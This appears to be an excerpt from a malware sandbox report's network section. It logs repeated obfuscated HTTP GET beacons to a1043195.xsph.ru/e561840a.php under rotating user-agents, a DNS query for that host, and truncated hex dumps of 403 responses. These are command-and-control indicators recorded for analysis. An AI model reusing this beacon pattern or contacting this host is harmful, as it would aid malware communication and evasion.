Source: global traffic	HTTP traffic detected: GET /e561840a.php?I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ru
Source: global traffic	HTTP traffic detected: GET /e561840a.php?TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /e561840a.php?TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: a1043195.xsph.ru
Source: global traffic	HTTP traffic detected: GET /e561840a.php?pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /e561840a.php?pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: a1043195.xsph.ru
Source: global traffic	HTTP traffic detected: GET /e561840a.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /e561840a.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1043195.xsph.ru
Source: global traffic	HTTP traffic detected: GET /e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ru
Source: global traffic	HTTP traffic detected: GET /e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: a1043195.xsph.ru
Source: global traffic	HTTP traffic detected: GET /e561840a.php?GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /e561840a.php?GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a1043195.xsph.ru
Source: global traffic	HTTP traffic detected: GET /e561840a.php?xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /e561840a.php?xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ru

Source: global traffic

DNS traffic detected: DNS query: a1043195.xsph.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 